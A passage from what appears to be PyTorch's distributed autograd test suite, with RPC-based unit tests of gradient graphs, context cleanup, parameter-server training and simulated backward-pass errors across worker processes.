# This function is the same as _run_trainer, except rpc calls torchscript
# function "my_script_ref_add" instead of python funciton "my_rref_add"
def _run_trainer_torchscript(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_script_ref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
class SimulateBackwardError(Function):
_simulate_error = True
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if SimulateBackwardError._simulate_error:
raise Exception("Simulate error on backward pass")
else:
return input
class ExecMode(Enum):
LOCAL = 1 # Run the operation locally.
RPC_SYNC = 2 # Run the operation using rpc_sync
REMOTE = 3 # Run the operation using remote.
RPC_ASYNC = 4 # Run the operation using rpc_async
@unittest.skipIf(
not torch._six.PY3, "Pytorch distributed autograd package does not support python2"
)
class DistAutogradTest(RpcAgentTestFixture):
def _exec_func_with_dst(self, dst, exec_mode, method, *args):
if ExecMode.LOCAL == exec_mode:
if len(args) == 1 and isinstance(args[0], list):
return method(*args[0])
return method(*args)
elif ExecMode.RPC_SYNC == exec_mode:
return rpc.rpc_sync(worker_name(dst), method, args=(args))
elif ExecMode.REMOTE == exec_mode:
return rpc.remote(worker_name(dst), method, args=(args)).to_here()
elif ExecMode.RPC_ASYNC == exec_mode:
fut = rpc.rpc_async(worker_name(dst), method, args=(args))
return fut.wait()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
def _exec_func(self, exec_mode, method, *args):
return self._exec_func_with_dst(
self._next_rank(), exec_mode, method, *args
)
def _next_rank(self):
if hasattr(self, "dst_rank"):
self.dst_rank = (self.dst_rank + 1) % self.world_size
if self.dst_rank == self.rank:
return self._next_rank()
else:
self.dst_rank = (self.rank + 1) % self.world_size
return self.dst_rank
def _check_rpc_done(self, rank_distance):
_check_rpc_done(rank_distance)
@dist_init
def test_autograd_context(self):
# Verify max possible id.
max_auto_increment = 281474976710655
self.assertEqual(
max_auto_increment + (self.worker_id << 48), dist_autograd._get_max_id()
)
context_ids = []
for i in range(1000):
with dist_autograd.context() as context_id:
self.assertEqual(
context_id,
dist_autograd._retrieve_context(context_id)._context_id(),
)
# First 16 bits should be worker_id.
self.assertEqual(self.worker_id, context_id >> 48)
context_ids.append(context_id)
for context_id in context_ids:
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd._retrieve_context(context_id)
@dist_init
def test_nested_context(self):
with dist_autograd.context() as context_id:
# Nested contexts not supported.
with self.assertRaisesRegex(
RuntimeError, "Already have an autograd context id for this thread"
):
with dist_autograd.context() as context_id:
pass
# For current context, this rank sends t1 and t2 tensors to dst_rank,
# then get t3 = torch.add(t1, t2) result tensor.
# For the current context in this rank, it expects graph like this:
# send function:
# rpcSendBackward
# / \
# t1.AccumulateGrad t2.AccumulateGrad
#
# recv function:
#
# |
# t3.rpcRecvBackward
#
def _verify_graph_for_first_rpc_call(
self, send_function, recv_function, t1, t2, ret
):
# Retrieve the next functions in the graph.
next_funcs = send_function.next_functions
self.assertEqual(2, len(next_funcs))
# We should now hit t1 and t2 in the autograd graph.
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[0][0].name())
self.assertEqual(t1, next_funcs[0][0].variable)
self.assertEqual(0, next_funcs[0][1])
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[1][0].name())
self.assertEqual(t2, next_funcs[1][0].variable)
self.assertEqual(0, next_funcs[1][1])
# Test recv functions.
self.assertEqual(ret.grad_fn, recv_function)
# For a context passed from previous nested chain calls, this rank
# receives two tensors t1 and t2, executes torch.add(t1, t2) and sends
# result tensor t3 back.
# For this context in this rank, it expects graph like this:
# send and recv functions:
# rpcSendBackward
# |
# t3.AddBackward0
# / \
# t1.recvRpcBackward t2.recvRpcBackward
def _verify_graph_for_rpc_call_exec(self, send_function):
# Verify next function is AddBackward0
next_funcs = send_function.next_functions
self.assertEqual(1, len(next_funcs))
add_backward_fn = next_funcs[0][0]
self.assertEqual("AddBackward0", add_backward_fn.name())
# Verify the next two functions are the same recv backward function.
next_funcs = add_backward_fn.next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
# For a context passed from previous nested chain calls, this rank
# receives two tensors t1 and t2, forwards t1 and t2 tensors using
# nested rpc call to next dst. In return route, receive result tensor t3
# from next dst and forwarding t3 back to previous calls.
# For this context in this rank, it expects graph like this:
# send and recv functions for receiving and forwarding t1 and t2:
# rpcSendBackward
# / \
# t1.recvRpcBackward t2.recvRpcBackward
# send and recv functions for receiving and forwarding t3:
# rpcSendBackward
# |
# t3.recvRpcBackward
def _verify_graph_for_nested_rpc_call(self, ctx):
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
# For send function when making nest rpc call,
# next functions of the send function are two recv functions
# for received two tensors from previous call
next_funcs = list(send_functions.values())[0].next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
# For send function when returning resonpose to previous call
# next function of the send function is the recv function
# for received tensor result returned from nested call
next_funcs = list(send_functions.values())[1].next_functions
self.assertEqual(1, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
def _test_graph(self, fn, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), fn, args=(t1, t2))
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), fn, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Verify graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
# Verify graph for previous context id.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
# autograd context should be cleaned up by now.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._retrieve_context(context_id)
# No autograd context available.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._current_context()
@dist_init
def test_graph_for_builtin_call(self):
self._test_graph(torch.add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_python_call(self):
self._test_graph(my_py_add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_builtin_remote_call(self):
self._test_graph(torch.add, ExecMode.REMOTE)
@dist_init
def test_graph_for_python_remote_call(self):
self._test_graph(my_py_add, ExecMode.REMOTE)
# 3-layer nested calls
def _test_graph_for_py_nested_call(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
nest_dst_rank = (dst_rank + 1) % self.world_size
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
# Barrier to ensure all RPCs are done.
dist.barrier()
for rd in [1, 2, 3]:
rpc.rpc_sync(
worker_name((self.rank + rd) % self.world_size),
_set_rpc_done,
args=(context_id, rd),
)
# Barrier to ensure all set_rpc_done have completed.
dist.barrier()
# For self.rank, it has 4 graphs to verify
# One is for current context id when this rank send first rpc call.
# Second one is for prev context id when this rank make 1st nested
# call.
# Third one is for prev prev context id when this rank make
# 2nd nested call.
# Last one is for prev prev prev context id when this rank
# execute the torch.add() operator.
# Verify first graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Verify second graph for 1st nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# Verify third graph for 2nd nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[2])
self._verify_graph_for_nested_rpc_call(ctx)
# verify last graph for rpc call execution.
ctx = dist_autograd._retrieve_context(ctx_ids[3])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call(self):
self._test_graph_for_py_nested_call(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call(self):
self._test_graph_for_py_nested_call(ExecMode.REMOTE)
# Rank0->Rank1->Rank0
def _test_graph_for_py_nested_call_itself(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name((self.rank + 1) % self.world_size),
_set_rpc_done,
args=(context_id, 1),
)
# For self.rank, it has 2 graphs to verify.
# One is for current context id when this rank send first rpc
# call and execute the torch.add() operator.
# Another one is for prev context id when this rank make
# nested call.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(2, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[1],
t1,
t2,
ret,
)
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[1])
# Verify two pairs of send and recv functions for nested
# call
self._check_rpc_done(1)
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.REMOTE)
def _test_no_graph_with_tensors_not_require_grad(self, exec_mode):
initialize_pg(self.init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.add, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
ctx = dist_autograd._current_context()
send_functions = ctx._send_functions()
self.assertEqual(len(send_functions), 0)
recv_functions = ctx._recv_functions()
self.assertEqual(len(recv_functions), 0)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
# NB: RRef.to_here() always passes the autograd context to the
# the callee, as the caller does not know whether the return
# value would contain a requires_grad tensor or not.
#
# rpc/remote with udf (_set_rpc_done here) also always passes the
# autograd context to the callee due to the same reason.
self.assertNotEqual(-1, dist_autograd._retrieve_context(ctx_ids[1]))
dist.barrier()
@dist_init
def test_no_graph_with_tensors_not_require_grad(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.RPC_SYNC)
@dist_init
def test_no_graph_with_tensors_not_require_grad_remote(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.REMOTE)
def _test_grad_only_on_return_value(self, exec_mode):
initialize_pg(self.init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), ret_requires_grad)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), ret_requires_grad
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
dist_autograd.backward(context_id, [ret.sum()])
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
grads = dist_autograd.get_gradients(ctx_ids[1])
self.assertEqual(1, len(grads))
self.assertIn(requires_grad_tensor, grads)
self.assertEqual(torch.ones_like(ret), grads[requires_grad_tensor])
# due to the above get_gradients call, ensure that dist autograd
# contexts aren't cleaned up until all workers exit context managers
dist.barrier()
@dist_init
def test_grad_only_on_return_value(self):
self._test_grad_only_on_return_value(ExecMode.RPC_SYNC)
@dist_init
def test_grad_only_on_return_value_remote(self):
self._test_grad_only_on_return_value(ExecMode.REMOTE)
def _test_rpc_complex_args(self, exec_mode):
with dist_autograd.context() as context_id:
num_tensors = 10
tensors = []
for i in range(num_tensors):
tensors.append(torch.ones(3, 3, requires_grad=(i % 2 == 0)))
dst_rank = self._next_rank()
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.stack, args=(tensors,)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.stack, args=(tensors,)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
self.assertEqual(torch.stack(tensors), ret)
# Verify appropriate tensors have been attached the autograd graph.
next_funcs = list(
dist_autograd._current_context()._send_functions().values()
)[0].next_functions
idx = 0
for i in range(len(next_funcs)):
self.assertEqual(
"torch::autograd::AccumulateGrad", next_funcs[i][0].name()
)
self.assertEqual(tensors[i], next_funcs[i][0].variable)
# Verify that the worker id has been recorded in the context
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(len(worker_ids), 1)
self.assertEqual(worker_ids, {dst_rank})
@dist_init
def test_rpc_complex_args(self):
self._test_rpc_complex_args(ExecMode.RPC_SYNC)
@dist_init
def test_remote_complex_args(self):
self._test_rpc_complex_args(ExecMode.REMOTE)
def context_cleanup_test_helper(self, rpc_args, func, nested=False):
initialize_pg(self.init_method, self.rank, self.world_size)
# test that in dist autograd, in the case that tensors communicated over RPC do
# NOT require grad, we still cleanup the dist autograd contexts created
# on other nodes. This is because the autograd context is still
# communicated over RPC even if tensor arguments do not require grad, as
# it is possible that the response could.
if nested:
dst_rank = (self.rank + 1) % self.world_size
nested_dst_rank = (dst_rank + 1) % self.world_size
dst_ranks = {dst_rank}
else:
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
if nested:
rpc.rpc_sync(
worker_name(nested_dst_rank),
_set_rpc_done,
args=(context_id, 2),
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_context_cleanup_tensor_no_grad(self):
t1 = torch.ones(3, 3, requires_grad=False)
self.context_cleanup_test_helper(rpc_args=(t1, t1), func=torch.add)
@dist_init
def test_context_cleanup_no_tensors(self):
self.context_cleanup_test_helper(rpc_args=(1, 1), func=my_scalar_add)
@dist_init
def test_context_cleanup_nested_rpc(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
dst_rank = (self.rank + 1) % self.world_size
args = (t1, t2, dst_rank, self.world_size, 0)
self.context_cleanup_test_helper(
rpc_args=args, func=my_py_nested_call, nested=True
)
@dist_init
def test_worker_ids_recorded(self):
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
# if no tensors require grad, we should still record worker_ids, as
# the autograd context ID is still passed to other workers.
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), torch.add, args=(t1, t2))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
# worker_ids should be recorded when tensors do require grad
t1.requires_grad = True
t2.requires_grad = True
for dst_rank in dst_ranks:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
@dist_init
def test_error_in_context(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(6, 6, requires_grad=True)
with self.assertRaises(RuntimeError):
# This should throw an error since matrix sizes don't match.
rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
def _verify_backwards(self, exec_mode, tensors, context_id, local_grads, *args):
if exec_mode == ExecMode.LOCAL:
torch.autograd.backward(tensors)
return [arg.grad for arg in args]
else:
self._verify_backwards_remote(tensors, context_id, local_grads, *args)
def _verify_backwards_remote(self, tensors, context_id, local_grads, *args):
dist_autograd.backward(context_id, tensors)
# Verify grads were accumulated appropriately.
grads = dist_autograd.get_gradients(context_id)
nargs = len(args)
ngrads = 0
for i in range(0, nargs):
if local_grads[i] is not None:
self.assertIn(args[i], grads)
self.assertEqual(local_grads[i], grads[args[i]])
ngrads += 1
else:
self.assertNotIn(args[i], grads)
self.assertEqual(ngrads, len(grads))
@dist_init
def test_backward_no_grad_on_tensor(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
self.assertIsNone(t1.grad)
self.assertIsNone(t2.grad)
# Now populate .grad with local autograd engine and
# verify dist autograd doesn't mess with it.
loss_local = torch.add(t1, t2).sum()
loss_local.backward()
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
t1_grad_before = t1.grad
t2_grad_before = t2.grad
dist_autograd.backward(context_id, [loss])
self.assertEqual(t1_grad_before, t1.grad)
self.assertEqual(t2_grad_before, t2.grad)
def _test_backward_simple(self, dst):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func_with_dst(
dst, exec_mode, torch.add, t1, t2
)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_simple(self):
self._test_backward_simple(self._next_rank())
@dist_init
def test_backward_simple_self(self):
self._test_backward_simple(self.rank)
# The current rank first creates a tensor on the rref_owner, and then passes
# the rref with another tensor to the callee to run either my_rref_add or
# my_nested_rref_add, depending on whether the callee is the rref owner.
# The grad of tensor lives on the current rank, and the grad of the rref
# tensor lives on the rref owner.
def _test_backward_rref(self, callee, rref_owner):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
with dist_autograd.context() as context_id:
rref_t1 = rpc.remote(
rref_owner, _torch_ones, args=((3, 3),), kwargs={"requires_grad": True}
)
if callee == rref_owner:
rref = rpc.remote(callee, my_rref_add, args=(rref_t1, t2))
else:
rref = rpc.remote(
callee, my_nested_rref_add, args=(rref_owner, rref_t1, t2)
)
ret = rref.to_here()
dist_autograd.backward(context_id, [ret.sum()])
# verify grads on caller
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t2, grads)
self.assertEqual(grads[t2], t2.grad)
# verify grads on rref owner
self.assertTrue(
rpc.rpc_sync(
rref_owner,
_compare_owner_value,
args=(context_id, rref_t1, t1.grad),
)
)
@dist_init
def test_backward_rref(self):
callee = worker_name(self._next_rank())
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_multi(self):
if self.rank > 0:
callee = "worker0"
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_nested(self):
callee = worker_name((self.rank + 1) % self.world_size)
rref_owner = worker_name((self.rank + 2) % self.world_size)
self._test_backward_rref(callee, rref_owner)
# In this test, every rank will serve as a parameter server (ps) and a
# driver, and then kicks off trainers on the other three ranks. So, we have:
# ps = rank0 with trainers = rank1/2/3
# ps = rank2 with trainers = rank2/3/0
# ps = rank3 with trainers = rank3/0/1
# ps = rank4 with trainers = rank0/1/2
#
# These four test ps-trainer groups run on completely separate autograd
# graphs, but they share the same set of underlying RpcAgents.
def _test_trainer_ps(self, create_ref_fn, trainer_fn):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
# create rref on self
rref_t1 = rpc.remote(
worker_name(self.rank),
create_ref_fn,
args=())
# kick off forward and backward pass on three other workers (trainers)
rank_diffs = [1, 2, 3]
futures = []
for rank_diff in rank_diffs:
futures.append(
rpc.rpc_async(
worker_name((self.rank + rank_diff) % self.world_size),
trainer_fn,
args=(rref_t1, t2, worker_name(self.rank), rank_diff),
)
)
# check if the trainers have done with their backward pass
for rank_diff in rank_diffs:
self._check_rpc_done(rank_diff)
# trainers are done and holding the context for verification
accumulate_grad_func = None
for rank_diff in rank_diffs:
# make sure grads are accumulated for the same tensors and values
# are all correct
ctx_id = ctx_ids[rank_diff]
grads = dist_autograd.get_gradients(ctx_id)
local_t1 = rref_t1.to_here()
self.assertIn(local_t1, grads)
self.assertEqual(grads[local_t1], t1.grad)
# unblock trainers
_set_rpc_done(None, 0)
# wait until all trainers are done
for fut in futures:
fut.wait()
@dist_init
def test_trainer_ps(self):
self._test_trainer_ps(create_tensor, _run_trainer)
@dist_init
def test_trainer_ps_torchscript_functions(self):
# TODO, need more investigation
# there is rref leak when shutting down, suspect it is because
# ref as arg is passed to pybind boundary, and the ref is not garbage
# collected by python when calling shutdown()
import torch.distributed.rpc.api as api
api._ignore_rref_leak = True
self._test_trainer_ps(create_torchscript_tensor, _run_trainer_torchscript)
@dist_init
def test_backward_multiple_round_trips(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3))
t3 = torch.rand((3, 3), requires_grad=True)
t4 = torch.rand((3, 3))
t5 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
# Multiple RPCs between different nodes.
val = self._exec_func(exec_mode, torch.add, t1, t2)
val = self._exec_func(exec_mode, torch.mul, t3, val)
s1 = self._exec_func(exec_mode, torch.stack, (t4, val))
s2 = self._exec_func(exec_mode, torch.stack, (t5, val))
val = self._exec_func(exec_mode, torch.bmm, s1, s2)
val = self._exec_func(exec_mode, torch.matmul, val, val)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3, t4, t5
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_different_tensor_dims(self):
local_grads = None
t1 = torch.rand((4, 6), requires_grad=True)
t2 = torch.rand((6, 5))
t3 = torch.rand((5, 7), requires_grad=True)
t4 = torch.rand((7, 9))
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
val = self._exec_func(exec_mode, torch.matmul, t1, t2)
val = self._exec_func(exec_mode, torch.chain_matmul, [val, t3, t4])
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t2, t3, t4
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_unused_tensors(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
s = self._exec_func(exec_mode, torch.stack, (t1, t2, t3))
val = self._exec_func(
exec_mode,
torch.matmul,
torch.narrow(s, 0, 0, 1),
torch.narrow(s, 0, 2, 1),
)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_multiple_output_tensors(self):
local_grads = None
t = torch.rand((10, 2), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
tensor_list = self._exec_func(exec_mode, torch.split, t, 2)
t1 = tensor_list[0]
t2 = tensor_list[2]
t3 = tensor_list[4]
val = self._exec_func(exec_mode, torch.chain_matmul, [t1, t2, t3])
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t
)
local_grads = ret if ret else local_grads
def _run_test_backward_unused_send_function_in_thread(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
# We don't use the result of an RPC function, as a result the
# backward pass would hang in the "FAST" mode.
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
val = torch.mul(t1, t2)
# Run backward, this would hang forever.
dist_autograd.backward(context_id, [val.sum()])
@dist_init
def test_backward_unused_send_function(self):
# Run the test in a thread which would never finish.
t = threading.Thread(
target=self._run_test_backward_unused_send_function_in_thread
)
t.daemon = True
t.start()
t.join(10) # Wait for 10s.
# Verify thread is still alive (indicating backward hasn't completed yet).
self.assertTrue(t.is_alive())
@dist_init
def test_backward_autograd_engine_error(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
# Perform some ops before error simulation.
tmp = (t1 + t2) * (t1 + t2)
t3 = SimulateBackwardError.apply(tmp)
# Run multiple round trips across different nodes and verify the
# original node receives an error thrown on a node deep in the chain.
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t2, t3)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.mul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.div, args=(val, t2)
)
with self.assertRaisesRegex(
RuntimeError, "Error on Node [0-9]+: Simulate error on backward pass"
):
# Run backwards, and validate we receive an error.
dist_autograd.backward(context_id, [val.sum()])
@dist_init(clean_shutdown=False)
@unittest.skipIf(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure(self):
rpc._set_rpc_timeout(timedelta(milliseconds=5000))
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
res = rpc.rpc_sync(
